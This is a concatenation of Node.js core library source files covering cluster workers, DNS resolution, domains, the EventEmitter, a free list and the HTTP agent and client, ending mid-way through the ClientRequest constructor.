  Worker.prototype.destroy = function(signo) {
    signo = signo || 'SIGTERM';
    var proc = this.process;
    if (this.isConnected()) {
      this.once('disconnect', proc.kill.bind(proc, signo));
      this.disconnect();
      return;
    }
    proc.kill(signo);
  };

  function onmessage(message, handle) {
    var worker = this;
    if (message.act === 'online')
      online(worker);
    else if (message.act === 'queryServer')
      queryServer(worker, message);
    else if (message.act === 'listening')
      listening(worker, message);
    else if (message.act === 'suicide')
      worker.suicide = true;
    else if (message.act === 'close')
      close(worker, message);
  }

  function online(worker) {
    worker.state = 'online';
    worker.emit('online');
    cluster.emit('online', worker);
  }

  function queryServer(worker, message) {
    var args = [message.address,
                message.port,
                message.addressType,
                message.fd];
    var key = args.join(':');
    var handle = handles[key];
    if (util.isUndefined(handle)) {
      var constructor = RoundRobinHandle;
      
      
      
      if (schedulingPolicy !== SCHED_RR ||
          message.addressType === 'udp4' ||
          message.addressType === 'udp6') {
        constructor = SharedHandle;
      }
      handles[key] = handle = new constructor(key,
                                              message.address,
                                              message.port,
                                              message.addressType,
                                              message.backlog,
                                              message.fd);
    }
    if (!handle.data) handle.data = message.data;

    
    handle.add(worker, function(errno, reply, handle) {
      reply = util._extend({
        errno: errno,
        key: key,
        ack: message.seq,
        data: handles[key].data
      }, reply);
      if (errno) delete handles[key];  
      send(worker, reply, handle);
    });
  }

  function listening(worker, message) {
    var info = {
      addressType: message.addressType,
      address: message.address,
      port: message.port,
      fd: message.fd
    };
    worker.state = 'listening';
    worker.emit('listening', info);
    cluster.emit('listening', worker, info);
  }

  
  function close(worker, message) {
    var key = message.key;
    var handle = handles[key];
    if (handle.remove(worker)) delete handles[key];
  }

  function send(worker, message, handle, cb) {
    sendHelper(worker.process, message, handle, cb);
  }
}


function workerInit() {
  var handles = {};

  
  cluster._setupWorker = function() {
    var worker = new Worker({
      id: +process.env.NODE_UNIQUE_ID | 0,
      process: process,
      state: 'online'
    });
    cluster.worker = worker;
    process.once('disconnect', function() {
      if (!worker.suicide) {
        
        
        process.exit(0);
      }
    });
    process.on('internalMessage', internal(worker, onmessage));
    send({ act: 'online' });
    function onmessage(message, handle) {
      if (message.act === 'newconn')
        onconnection(message, handle);
      else if (message.act === 'disconnect')
        worker.disconnect();
    }
  };

  
  cluster._getServer = function(obj, address, port, addressType, fd, cb) {
    var message = {
      addressType: addressType,
      address: address,
      port: port,
      act: 'queryServer',
      fd: fd,
      data: null
    };
    
    if (obj._getServerData) message.data = obj._getServerData();
    send(message, function(reply, handle) {
      if (obj._setServerData) obj._setServerData(reply.data);

      if (handle)
        shared(reply, handle, cb);  
      else
        rr(reply, cb);              
    });
    obj.once('listening', function() {
      cluster.worker.state = 'listening';
      var address = obj.address();
      message.act = 'listening';
      message.port = address && address.port || port;
      send(message);
    });
  };

  
  function shared(message, handle, cb) {
    var key = message.key;
    
    
    var close = handle.close;
    handle.close = function() {
      delete handles[key];
      return close.apply(this, arguments);
    };
    assert(util.isUndefined(handles[key]));
    handles[key] = handle;
    cb(message.errno, handle);
  }

  
  function rr(message, cb) {
    if (message.errno)
      return cb(message.errno, null);

    var key = message.key;
    function listen(backlog) {
      
      
      
      return 0;
    }

    function close() {
      
      
      
      
      
      if (util.isUndefined(key)) return;
      send({ act: 'close', key: key });
      delete handles[key];
      key = undefined;
    }

    function getsockname(out) {
      if (key) util._extend(out, message.sockname);
      return 0;
    }

    
    
    
    var handle = {
      close: close,
      listen: listen
    };
    if (message.sockname) {
      handle.getsockname = getsockname;  
    }
    assert(util.isUndefined(handles[key]));
    handles[key] = handle;
    cb(0, handle);
  }

  
  function onconnection(message, handle) {
    var key = message.key;
    var server = handles[key];
    var accepted = !util.isUndefined(server);
    send({ ack: message.seq, accepted: accepted });
    if (accepted) server.onconnection(0, handle);
  }

  Worker.prototype.disconnect = function() {
    this.suicide = true;
    for (var key in handles) {
      var handle = handles[key];
      delete handles[key];
      handle.close();
    }
    process.disconnect();
  };

  Worker.prototype.destroy = function() {
    this.suicide = true;
    if (!this.isConnected()) process.exit(0);
    var exit = process.exit.bind(null, 0);
    send({ act: 'suicide' }, exit);
    process.once('disconnect', exit);
    process.disconnect();
  };

  function send(message, cb) {
    sendHelper(process, message, null, cb);
  }
}


var seq = 0;
var callbacks = {};
function sendHelper(proc, message, handle, cb) {
  
  message = util._extend({ cmd: 'NODE_CLUSTER' }, message);
  if (cb) callbacks[seq] = cb;
  message.seq = seq;
  seq += 1;
  proc.send(message, handle);
}




function internal(worker, cb) {
  return function(message, handle) {
    'use strict';

    if (message.cmd !== 'NODE_CLUSTER') return;
    var fn = cb;
    if (!util.isUndefined(message.ack)) {
      fn = callbacks[message.ack];
      delete callbacks[message.ack];
    }
    fn.apply(worker, arguments);
  };
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

========






















var net = require('net');
var util = require('util');

var cares = process.binding('cares_wrap');
var uv = process.binding('uv');

var isIp = net.isIP;


function errnoException(err, syscall, hostname) {
  
  
  if (err === uv.UV_EAI_MEMORY ||
      err === uv.UV_EAI_NODATA ||
      err === uv.UV_EAI_NONAME) {
    err = 'ENOTFOUND';
  }
  var ex = null;
  if (typeof err === 'string') {  
    ex = new Error(syscall + ' ' + err + (hostname ? ' ' + hostname : ''));
    ex.code = err;
    ex.errno = err;
    ex.syscall = syscall;
  } else {
    ex = util._errnoException(err, syscall);
  }
  if (hostname) {
    ex.hostname = hostname;
  }
  return ex;
}


















function makeAsync(callback) {
  if (!util.isFunction(callback)) {
    return callback;
  }
  return function asyncCallback() {
    if (asyncCallback.immediately) {
      
      callback.apply(null, arguments);
    } else {
      var args = arguments;
      process.nextTick(function() {
        callback.apply(null, args);
      });
    }
  };
}


function onlookup(err, addresses) {
  if (err) {
    return this.callback(errnoException(err, 'getaddrinfo', this.hostname));
  }
  if (this.family) {
    this.callback(null, addresses[0], this.family);
  } else {
    this.callback(null, addresses[0], addresses[0].indexOf(':') >= 0 ? 6 : 4);
  }
}




exports.lookup = function lookup(hostname, options, callback) {
  var hints = 0;
  var family = -1;

  
  if (hostname && typeof hostname !== 'string') {
    throw TypeError('invalid arguments: hostname must be a string or falsey');
  } else if (typeof options === 'function') {
    callback = options;
    family = 0;
  } else if (typeof callback !== 'function') {
    throw TypeError('invalid arguments: callback must be passed');
  } else if (util.isObject(options)) {
    hints = options.hints >>> 0;
    family = options.family >>> 0;

    if (hints !== 0 &&
        hints !== exports.ADDRCONFIG &&
        hints !== exports.V4MAPPED &&
        hints !== (exports.ADDRCONFIG | exports.V4MAPPED)) {
      throw new TypeError('invalid argument: hints must use valid flags');
    }
  } else {
    family = options >>> 0;
  }

  if (family !== 0 && family !== 4 && family !== 6)
    throw new TypeError('invalid argument: family must be 4 or 6');

  callback = makeAsync(callback);

  if (!hostname) {
    callback(null, null, family === 6 ? 6 : 4);
    return {};
  }

  var matchedFamily = net.isIP(hostname);
  if (matchedFamily) {
    callback(null, hostname, matchedFamily);
    return {};
  }

  var req = {
    callback: callback,
    family: family,
    hostname: hostname,
    oncomplete: onlookup
  };

  var err = cares.getaddrinfo(req, hostname, family, hints);
  if (err) {
    callback(errnoException(err, 'getaddrinfo', hostname));
    return {};
  }

  callback.immediately = true;
  return req;
};


function onlookupservice(err, host, service) {
  if (err)
    return this.callback(errnoException(err, 'getnameinfo', this.host));

  this.callback(null, host, service);
}



exports.lookupService = function(host, port, callback) {
  if (arguments.length !== 3)
    throw new Error('invalid arguments');

  if (cares.isIP(host) === 0)
    throw new TypeError('host needs to be a valid IP address');

  callback = makeAsync(callback);

  var req = {
    callback: callback,
    host: host,
    port: port,
    oncomplete: onlookupservice
  };
  var err = cares.getnameinfo(req, host, port);
  if (err) throw errnoException(err, 'getnameinfo', host);

  callback.immediately = true;
  return req;
};


function onresolve(err, result) {
  if (err)
    this.callback(errnoException(err, this.bindingName, this.hostname));
  else
    this.callback(null, result);
}


function resolver(bindingName) {
  var binding = cares[bindingName];

  return function query(name, callback) {
    if (!util.isString(name)) {
      throw new Error('Name must be a string');
    } else if (!util.isFunction(callback)) {
      throw new Error('Callback must be a function');
    }

    callback = makeAsync(callback);
    var req = {
      bindingName: bindingName,
      callback: callback,
      hostname: name,
      oncomplete: onresolve
    };
    var err = binding(req, name);
    if (err) throw errnoException(err, bindingName);
    callback.immediately = true;
    return req;
  }
}


var resolveMap = {};
exports.resolve4 = resolveMap.A = resolver('queryA');
exports.resolve6 = resolveMap.AAAA = resolver('queryAaaa');
exports.resolveCname = resolveMap.CNAME = resolver('queryCname');
exports.resolveMx = resolveMap.MX = resolver('queryMx');
exports.resolveNs = resolveMap.NS = resolver('queryNs');
exports.resolveTxt = resolveMap.TXT = resolver('queryTxt');
exports.resolveSrv = resolveMap.SRV = resolver('querySrv');
exports.resolveNaptr = resolveMap.NAPTR = resolver('queryNaptr');
exports.resolveSoa = resolveMap.SOA = resolver('querySoa');
exports.reverse = resolveMap.PTR = resolver('getHostByAddr');


exports.resolve = function(hostname, type_, callback_) {
  var resolver, callback;
  if (util.isString(type_)) {
    resolver = resolveMap[type_];
    callback = callback_;
  } else if (util.isFunction(type_)) {
    resolver = exports.resolve4;
    callback = type_;
  } else {
    throw new Error('Type must be a string');
  }

  if (util.isFunction(resolver)) {
    return resolver(hostname, callback);
  } else {
    throw new Error('Unknown type "' + type_ + '"');
  }
};


exports.getServers = function() {
  return cares.getServers();
};


exports.setServers = function(servers) {
  
  
  var orig = cares.getServers();

  var newSet = [];

  servers.forEach(function(serv) {
    var ver = isIp(serv);

    if (ver)
      return newSet.push([ver, serv]);

    var match = serv.match(/\[(.*)\](:\d+)?/);

    
    if (match) {
      ver = isIp(match[1]);
      if (ver)
        return newSet.push([ver, match[1]]);
    }

    var s = serv.split(/:\d+$/)[0];
    ver = isIp(s);

    if (ver)
      return newSet.push([ver, s]);

    throw new Error('IP address is not properly formatted: ' + serv);
  });

  var r = cares.setServers(newSet);

  if (r) {
    
    cares.setServers(orig.join(','));

    var err = cares.strerror(r);
    throw new Error('c-ares failed to set servers: "' + err +
                    '" [' + servers + ']');
  }
};


exports.ADDRCONFIG = cares.AI_ADDRCONFIG;
exports.V4MAPPED = cares.AI_V4MAPPED;


exports.NODATA = 'ENODATA';
exports.FORMERR = 'EFORMERR';
exports.SERVFAIL = 'ESERVFAIL';
exports.NOTFOUND = 'ENOTFOUND';
exports.NOTIMP = 'ENOTIMP';
exports.REFUSED = 'EREFUSED';
exports.BADQUERY = 'EBADQUERY';
exports.ADNAME = 'EADNAME';
exports.BADFAMILY = 'EBADFAMILY';
exports.BADRESP = 'EBADRESP';
exports.CONNREFUSED = 'ECONNREFUSED';
exports.TIMEOUT = 'ETIMEOUT';
exports.EOF = 'EOF';
exports.FILE = 'EFILE';
exports.NOMEM = 'ENOMEM';
exports.DESTRUCTION = 'EDESTRUCTION';
exports.BADSTR = 'EBADSTR';
exports.BADFLAGS = 'EBADFLAGS';
exports.NONAME = 'ENONAME';
exports.BADHINTS = 'EBADHINTS';
exports.NOTINITIALIZED = 'ENOTINITIALIZED';
exports.LOADIPHLPAPI = 'ELOADIPHLPAPI';
exports.ADDRGETNETWORKPARAMS = 'EADDRGETNETWORKPARAMS';
exports.CANCELLED = 'ECANCELLED';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

========






















var util = require('util');
var EventEmitter = require('events');
var inherits = util.inherits;




EventEmitter.usingDomains = true;



var _domain = [null];
Object.defineProperty(process, 'domain', {
  enumerable: true,
  get: function() {
    return _domain[0];
  },
  set: function(arg) {
    return _domain[0] = arg;
  }
});



var _domain_flag = {};


process._setupDomainUse(_domain, _domain_flag);

exports.Domain = Domain;

exports.create = exports.createDomain = function() {
  return new Domain();
};



var stack = [];
exports._stack = stack;

exports.active = null;


inherits(Domain, EventEmitter);

function Domain() {
  EventEmitter.call(this);

  this.members = [];
}

Domain.prototype.members = undefined;
Domain.prototype._disposed = undefined;



Domain.prototype._errorHandler = function errorHandler(er) {
  var caught = false;
  
  
  
  
  
  if (this._disposed)
    return true;

  if (!util.isPrimitive(er)) {
    er.domain = this;
    er.domainThrown = true;
  }
  
  try {
    
    
    
    
    
    
    
    
    caught = this.emit('error', er);

    
    
    
    stack.length = 0;
    exports.active = process.domain = null;
  } catch (er2) {
    
    
    
    
    if (this === exports.active) {
      stack.pop();
    }
    if (stack.length) {
      exports.active = process.domain = stack[stack.length - 1];
      caught = process._fatalException(er2);
    } else {
      caught = false;
    }
    return caught;
  }
  return caught;
};


Domain.prototype.enter = function() {
  if (this._disposed) return;

  
  
  exports.active = process.domain = this;
  stack.push(this);
  _domain_flag[0] = stack.length;
};


Domain.prototype.exit = function() {
  
  
  var index = stack.lastIndexOf(this);
  if (this._disposed || index === -1) return;

  
  stack.splice(index);
  _domain_flag[0] = stack.length;

  exports.active = stack[stack.length - 1];
  process.domain = exports.active;
};



Domain.prototype.add = function(ee) {
  
  if (this._disposed || ee.domain === this)
    return;

  
  if (ee.domain)
    ee.domain.remove(ee);

  
  
  
  
  
  
  
  
  
  if (this.domain && (ee instanceof Domain)) {
    for (var d = this.domain; d; d = d.domain) {
      if (ee === d) return;
    }
  }

  ee.domain = this;
  this.members.push(ee);
};


Domain.prototype.remove = function(ee) {
  ee.domain = null;
  var index = this.members.indexOf(ee);
  if (index !== -1)
    this.members.splice(index, 1);
};


Domain.prototype.run = function(fn) {
  if (this._disposed)
    return;
  this.enter();
  var ret = fn.call(this);
  this.exit();
  return ret;
};


function intercepted(_this, self, cb, fnargs) {
  if (self._disposed)
    return;

  if (fnargs[0] && fnargs[0] instanceof Error) {
    var er = fnargs[0];
    util._extend(er, {
      domainBound: cb,
      domainThrown: false,
      domain: self
    });
    self.emit('error', er);
    return;
  }

  var args = [];
  var i, ret;

  self.enter();
  if (fnargs.length > 1) {
    for (i = 1; i < fnargs.length; i++)
      args.push(fnargs[i]);
    ret = cb.apply(_this, args);
  } else {
    ret = cb.call(_this);
  }
  self.exit();

  return ret;
}


Domain.prototype.intercept = function(cb) {
  var self = this;

  function runIntercepted() {
    return intercepted(this, self, cb, arguments);
  }

  return runIntercepted;
};


function bound(_this, self, cb, fnargs) {
  if (self._disposed)
    return;

  var ret;

  self.enter();
  if (fnargs.length > 0)
    ret = cb.apply(_this, fnargs);
  else
    ret = cb.call(_this);
  self.exit();

  return ret;
}


Domain.prototype.bind = function(cb) {
  var self = this;

  function runBound() {
    return bound(this, self, cb, arguments);
  }

  runBound.domain = this;

  return runBound;
};


Domain.prototype.dispose = util.deprecate(function() {
  if (this._disposed) return;

  
  this.exit();

  
  if (this.domain) this.domain.remove(this);

  
  this.members.length = 0;

  
  
  this._disposed = true;
});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

========






















var domain;
var util = require('util');

function EventEmitter() {
  EventEmitter.init.call(this);
}
module.exports = EventEmitter;


EventEmitter.EventEmitter = EventEmitter;

EventEmitter.usingDomains = false;

EventEmitter.prototype.domain = undefined;
EventEmitter.prototype._events = undefined;
EventEmitter.prototype._maxListeners = undefined;



EventEmitter.defaultMaxListeners = 10;

EventEmitter.init = function() {
  this.domain = null;
  if (EventEmitter.usingDomains) {
    
    domain = domain || require('domain');
    if (domain.active && !(this instanceof domain.Domain)) {
      this.domain = domain.active;
    }
  }

  if (!this._events || this._events === Object.getPrototypeOf(this)._events)
    this._events = {};

  this._maxListeners = this._maxListeners || undefined;
};



EventEmitter.prototype.setMaxListeners = function setMaxListeners(n) {
  if (!util.isNumber(n) || n < 0 || isNaN(n))
    throw TypeError('n must be a positive number');
  this._maxListeners = n;
  return this;
};

EventEmitter.prototype.emit = function emit(type) {
  var er, handler, len, args, i, listeners;

  if (!this._events)
    this._events = {};

  
  if (type === 'error' && !this._events.error) {
    er = arguments[1];
    if (this.domain) {
      if (!er)
        er = new Error('Uncaught, unspecified "error" event.');
      er.domainEmitter = this;
      er.domain = this.domain;
      er.domainThrown = false;
      this.domain.emit('error', er);
    } else if (er instanceof Error) {
      throw er; 
    } else {
      throw Error('Uncaught, unspecified "error" event.');
    }
    return false;
  }

  handler = this._events[type];

  if (util.isUndefined(handler))
    return false;

  if (this.domain && this !== process)
    this.domain.enter();

  if (util.isFunction(handler)) {
    switch (arguments.length) {
      
      case 1:
        handler.call(this);
        break;
      case 2:
        handler.call(this, arguments[1]);
        break;
      case 3:
        handler.call(this, arguments[1], arguments[2]);
        break;
      
      default:
        len = arguments.length;
        args = new Array(len - 1);
        for (i = 1; i < len; i++)
          args[i - 1] = arguments[i];
        handler.apply(this, args);
    }
  } else if (util.isObject(handler)) {
    len = arguments.length;
    args = new Array(len - 1);
    for (i = 1; i < len; i++)
      args[i - 1] = arguments[i];

    listeners = handler.slice();
    len = listeners.length;
    for (i = 0; i < len; i++)
      listeners[i].apply(this, args);
  }

  if (this.domain && this !== process)
    this.domain.exit();

  return true;
};

EventEmitter.prototype.addListener = function addListener(type, listener) {
  var m;

  if (!util.isFunction(listener))
    throw TypeError('listener must be a function');

  if (!this._events)
    this._events = {};

  
  
  if (this._events.newListener)
    this.emit('newListener', type,
              util.isFunction(listener.listener) ?
              listener.listener : listener);

  if (!this._events[type])
    
    this._events[type] = listener;
  else if (util.isObject(this._events[type]))
    
    this._events[type].push(listener);
  else
    
    this._events[type] = [this._events[type], listener];

  
  if (util.isObject(this._events[type]) && !this._events[type].warned) {
    var m;
    if (!util.isUndefined(this._maxListeners)) {
      m = this._maxListeners;
    } else {
      m = EventEmitter.defaultMaxListeners;
    }

    if (m && m > 0 && this._events[type].length > m) {
      this._events[type].warned = true;
      console.error('(node) warning: possible EventEmitter memory ' +
                    'leak detected. %d %s listeners added. ' +
                    'Use emitter.setMaxListeners() to increase limit.',
                    this._events[type].length, type);
      console.trace();
    }
  }

  return this;
};

EventEmitter.prototype.on = EventEmitter.prototype.addListener;

EventEmitter.prototype.once = function once(type, listener) {
  if (!util.isFunction(listener))
    throw TypeError('listener must be a function');

  var fired = false;

  function g() {
    this.removeListener(type, g);

    if (!fired) {
      fired = true;
      listener.apply(this, arguments);
    }
  }

  g.listener = listener;
  this.on(type, g);

  return this;
};


EventEmitter.prototype.removeListener =
    function removeListener(type, listener) {
  var list, position, length, i;

  if (!util.isFunction(listener))
    throw TypeError('listener must be a function');

  if (!this._events || !this._events[type])
    return this;

  list = this._events[type];
  length = list.length;
  position = -1;

  if (list === listener ||
      (util.isFunction(list.listener) && list.listener === listener)) {
    delete this._events[type];
    if (this._events.removeListener)
      this.emit('removeListener', type, listener);

  } else if (util.isObject(list)) {
    for (i = length; i-- > 0;) {
      if (list[i] === listener ||
          (list[i].listener && list[i].listener === listener)) {
        position = i;
        break;
      }
    }

    if (position < 0)
      return this;

    if (list.length === 1) {
      list.length = 0;
      delete this._events[type];
    } else {
      list.splice(position, 1);
    }

    if (this._events.removeListener)
      this.emit('removeListener', type, listener);
  }

  return this;
};

EventEmitter.prototype.removeAllListeners =
    function removeAllListeners(type) {
  var key, listeners;

  if (!this._events)
    return this;

  
  if (!this._events.removeListener) {
    if (arguments.length === 0)
      this._events = {};
    else if (this._events[type])
      delete this._events[type];
    return this;
  }

  
  if (arguments.length === 0) {
    for (key in this._events) {
      if (key === 'removeListener') continue;
      this.removeAllListeners(key);
    }
    this.removeAllListeners('removeListener');
    this._events = {};
    return this;
  }

  listeners = this._events[type];

  if (util.isFunction(listeners)) {
    this.removeListener(type, listeners);
  } else if (Array.isArray(listeners)) {
    
    while (listeners.length)
      this.removeListener(type, listeners[listeners.length - 1]);
  }
  delete this._events[type];

  return this;
};

EventEmitter.prototype.listeners = function listeners(type) {
  var ret;
  if (!this._events || !this._events[type])
    ret = [];
  else if (util.isFunction(this._events[type]))
    ret = [this._events[type]];
  else
    ret = this._events[type].slice();
  return ret;
};

EventEmitter.listenerCount = function(emitter, type) {
  var ret;
  if (!emitter._events || !emitter._events[type])
    ret = 0;
  else if (util.isFunction(emitter._events[type]))
    ret = 1;
  else
    ret = emitter._events[type].length;
  return ret;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  

========























exports.FreeList = function(name, max, constructor) {
  this.name = name;
  this.constructor = constructor;
  this.max = max;
  this.list = [];
};


exports.FreeList.prototype.alloc = function() {
  
  return this.list.length ? this.list.shift() :
                            this.constructor.apply(this, arguments);
};


exports.FreeList.prototype.free = function(obj) {
  
  if (this.list.length < this.max) {
    this.list.push(obj);
    return true;
  }
  return false;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

========






















var util = require('util');
var EventEmitter = require('events').EventEmitter;


exports.IncomingMessage = require('_http_incoming').IncomingMessage;


var common = require('_http_common');
exports.METHODS = util._extend([], common.methods).sort();


exports.OutgoingMessage = require('_http_outgoing').OutgoingMessage;


var server = require('_http_server');
exports.ServerResponse = server.ServerResponse;
exports.STATUS_CODES = server.STATUS_CODES;


var agent = require('_http_agent');
var Agent = exports.Agent = agent.Agent;
exports.globalAgent = agent.globalAgent;

var client = require('_http_client');
var ClientRequest = exports.ClientRequest = client.ClientRequest;

exports.request = function(options, cb) {
  return new ClientRequest(options, cb);
};

exports.get = function(options, cb) {
  var req = exports.request(options, cb);
  req.end();
  return req;
};

exports._connectionListener = server._connectionListener;
var Server = exports.Server = server.Server;

exports.createServer = function(requestListener) {
  return new Server(requestListener);
};




function Client(port, host) {
  if (!(this instanceof Client)) return new Client(port, host);
  EventEmitter.call(this);

  host = host || 'localhost';
  port = port || 80;
  this.host = host;
  this.port = port;
  this.agent = new Agent({ host: host, port: port, maxSockets: 1 });
}
util.inherits(Client, EventEmitter);
Client.prototype.request = function(method, path, headers) {
  var self = this;
  var options = {};
  options.host = self.host;
  options.port = self.port;
  if (method[0] === '/') {
    headers = path;
    path = method;
    method = 'GET';
  }
  options.method = method;
  options.path = path;
  options.headers = headers;
  options.agent = self.agent;
  var c = new ClientRequest(options);
  c.on('error', function(e) {
    self.emit('error', e);
  });
  
  
  
  c.on('socket', function(s) {
    s.on('end', function() {
      if (self._decoder) {
        var ret = self._decoder.end();
        if (ret)
          self.emit('data', ret);
      }
      self.emit('end');
    });
  });
  return c;
};

exports.Client = util.deprecate(Client,
    'http.Client will be removed soon. Do not use it.');

exports.createClient = util.deprecate(function(port, host) {
  return new Client(port, host);
}, 'http.createClient is deprecated. Use `http.request` instead.');
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

========






















var net = require('net');
var util = require('util');
var EventEmitter = require('events').EventEmitter;
var debug = util.debuglog('http');













function Agent(options) {
  if (!(this instanceof Agent))
    return new Agent(options);

  EventEmitter.call(this);

  var self = this;

  self.defaultPort = 80;
  self.protocol = 'http:';

  self.options = util._extend({}, options);

  
  self.options.path = null;
  self.requests = {};
  self.sockets = {};
  self.freeSockets = {};
  self.keepAliveMsecs = self.options.keepAliveMsecs || 1000;
  self.keepAlive = self.options.keepAlive || false;
  self.maxSockets = self.options.maxSockets || Agent.defaultMaxSockets;
  self.maxFreeSockets = self.options.maxFreeSockets || 256;

  self.on('free', function(socket, options) {
    var name = self.getName(options);
    debug('agent.on(free)', name);

    if (!socket.destroyed &&
        self.requests[name] && self.requests[name].length) {
      self.requests[name].shift().onSocket(socket);
      if (self.requests[name].length === 0) {
        
        delete self.requests[name];
      }
    } else {
      
      
      var req = socket._httpMessage;
      if (req &&
          req.shouldKeepAlive &&
          !socket.destroyed &&
          self.options.keepAlive) {
        var freeSockets = self.freeSockets[name];
        var freeLen = freeSockets ? freeSockets.length : 0;
        var count = freeLen;
        if (self.sockets[name])
          count += self.sockets[name].length;

        if (count >= self.maxSockets || freeLen >= self.maxFreeSockets) {
          self.removeSocket(socket, options);
          socket.destroy();
        } else {
          freeSockets = freeSockets || [];
          self.freeSockets[name] = freeSockets;
          socket.setKeepAlive(true, self.keepAliveMsecs);
          socket.unref();
          socket._httpMessage = null;
          self.removeSocket(socket, options);
          freeSockets.push(socket);
        }
      } else {
        self.removeSocket(socket, options);
        socket.destroy();
      }
    }
  });
}

util.inherits(Agent, EventEmitter);
exports.Agent = Agent;

Agent.defaultMaxSockets = Infinity;

Agent.prototype.createConnection = net.createConnection;


Agent.prototype.getName = function(options) {
  var name = '';

  if (options.host)
    name += options.host;
  else
    name += 'localhost';

  name += ':';
  if (options.port)
    name += options.port;
  name += ':';
  if (options.localAddress)
    name += options.localAddress;
  name += ':';
  return name;
};

Agent.prototype.addRequest = function(req, options) {
  
  if (typeof options === 'string') {
    options = {
      host: options,
      port: arguments[2],
      path: arguments[3]
    };
  }

  var name = this.getName(options);
  if (!this.sockets[name]) {
    this.sockets[name] = [];
  }

  var freeLen = this.freeSockets[name] ? this.freeSockets[name].length : 0;
  var sockLen = freeLen + this.sockets[name].length;

  if (freeLen) {
    
    var socket = this.freeSockets[name].shift();
    debug('have free socket');

    
    if (!this.freeSockets[name].length)
      delete this.freeSockets[name];

    socket.ref();
    req.onSocket(socket);
    this.sockets[name].push(socket);
  } else if (sockLen < this.maxSockets) {
    debug('call onSocket', sockLen, freeLen);
    
    req.onSocket(this.createSocket(req, options));
  } else {
    debug('wait for socket');
    
    if (!this.requests[name]) {
      this.requests[name] = [];
    }
    this.requests[name].push(req);
  }
};

Agent.prototype.createSocket = function(req, options) {
  var self = this;
  options = util._extend({}, options);
  options = util._extend(options, self.options);

  options.servername = options.host;
  if (req) {
    var hostHeader = req.getHeader('host');
    if (hostHeader) {
      options.servername = hostHeader.replace(/:.*$/, '');
    }
  }

  var name = self.getName(options);

  debug('createConnection', name, options);
  options.encoding = null;
  var s = self.createConnection(options);
  if (!self.sockets[name]) {
    self.sockets[name] = [];
  }
  this.sockets[name].push(s);
  debug('sockets', name, this.sockets[name].length);

  function onFree() {
    self.emit('free', s, options);
  }
  s.on('free', onFree);

  function onClose(err) {
    debug('CLIENT socket onClose');
    
    
    
    self.removeSocket(s, options);
  }
  s.on('close', onClose);

  function onRemove() {
    
    
    
    debug('CLIENT socket onRemove');
    self.removeSocket(s, options);
    s.removeListener('close', onClose);
    s.removeListener('free', onFree);
    s.removeListener('agentRemove', onRemove);
  }
  s.on('agentRemove', onRemove);
  return s;
};

Agent.prototype.removeSocket = function(s, options) {
  var name = this.getName(options);
  debug('removeSocket', name, 'destroyed:', s.destroyed);
  var sets = [this.sockets];

  
  if (s.destroyed)
    sets.push(this.freeSockets);

  for (var sk = 0; sk < sets.length; sk++) {
    var sockets = sets[sk];

    if (sockets[name]) {
      var index = sockets[name].indexOf(s);
      if (index !== -1) {
        sockets[name].splice(index, 1);
        
        if (sockets[name].length === 0)
          delete sockets[name];
      }
    }
  }

  if (this.requests[name] && this.requests[name].length) {
    debug('removeSocket, have a request, make a socket');
    var req = this.requests[name][0];
    
    this.createSocket(req, options).emit('free');
  }
};

Agent.prototype.destroy = function() {
  var sets = [this.freeSockets, this.sockets];
  for (var s = 0; s < sets.length; s++) {
    var set = sets[s];
    var keys = Object.keys(set);
    for (var v = 0; v < keys.length; v++) {
      var setName = set[keys[v]];
      for (var n = 0; n < setName.length; n++) {
        setName[n].destroy();
      }
    }
  }
};

exports.globalAgent = new Agent();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         

========






















var util = require('util');
var net = require('net');
var url = require('url');
var EventEmitter = require('events').EventEmitter;
var HTTPParser = process.binding('http_parser').HTTPParser;
var assert = require('assert').ok;

var common = require('_http_common');

var httpSocketSetup = common.httpSocketSetup;
var parsers = common.parsers;
var freeParser = common.freeParser;

var OutgoingMessage = require('_http_outgoing').OutgoingMessage;

var Agent = require('_http_agent');


function ClientRequest(options, cb) {
  var self = this;
  OutgoingMessage.call(self);

  if (util.isString(options)) {
    options = url.parse(options);
  } else {
    options = util._extend({}, options);
  }

  var agent = options.agent;
  var defaultAgent = options._defaultAgent || Agent.globalAgent;
  if (agent === false) {
    agent = new defaultAgent.constructor();
  } else if (util.isNullOrUndefined(agent) && !options.createConnection) {
    agent = defaultAgent;
  }
  self.agent = agent;

  var protocol = options.protocol || defaultAgent.protocol;
  var expectedProtocol = defaultAgent.protocol;
  if (self.agent && self.agent.protocol)
